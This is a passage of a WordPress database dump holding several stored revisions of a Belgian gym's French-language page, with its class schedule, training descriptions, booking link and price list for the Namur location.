href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills.png\"><img class=\"alignnone  wp-image-461\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills.png\" width=\"90\"/></a></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-12-15 19:41:10', '2014-12-15 19:41:10', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(464, 1, '2014-12-15 19:42:49', '2014-12-15 19:42:49', '', 'LesMills', '', 'inherit', 'open', 'open', '', 'lesmills-2', '', '', '2014-12-15 19:42:49', '2014-12-15 19:42:49', '', 363, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png', 0, 'attachment', 'image/png', 0),
(465, 1, '2014-12-15 19:43:23', '2014-12-15 19:43:23', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\"><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"140\" height=\"30\" /></a></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-12-15 19:43:23', '2014-12-15 19:43:23', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(467, 1, '2014-12-15 19:44:38', '2014-12-15 19:44:38', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-12-15 19:44:38', '2014-12-15 19:44:38', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(482, 1, '2015-04-21 09:53:17', '2015-04-21 09:53:17', '<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\" valign=\"center\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-04-21 09:53:17', '2015-04-21 09:53:17', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
